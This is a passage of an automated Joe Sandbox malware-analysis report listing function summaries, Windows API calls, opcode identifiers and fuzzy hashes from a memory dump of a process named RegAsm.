                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendmemset
                                                                                  • String ID: F^@
                                                                                  • API String ID: 568519121-3652327722
                                                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindowmemset
                                                                                  • String ID: WinPos
                                                                                  • API String ID: 4036792311-2823255486
                                                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                  APIs
                                                                                    • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$memset
                                                                                  • String ID:
                                                                                  • API String ID: 1860491036-0
                                                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                  APIs
                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                  • free.MSVCRT ref: 0040A908
                                                                                  • free.MSVCRT ref: 0040A92B
                                                                                  • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 726966127-0
                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                  APIs
                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                  • free.MSVCRT ref: 0040B201
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                  • free.MSVCRT ref: 0040B224
                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                  • String ID:
                                                                                  • API String ID: 726966127-0
                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                  APIs
                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3669619086-0
                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                  • free.MSVCRT ref: 00417425
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                  • String ID:
                                                                                  • API String ID: 2605342592-0
                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5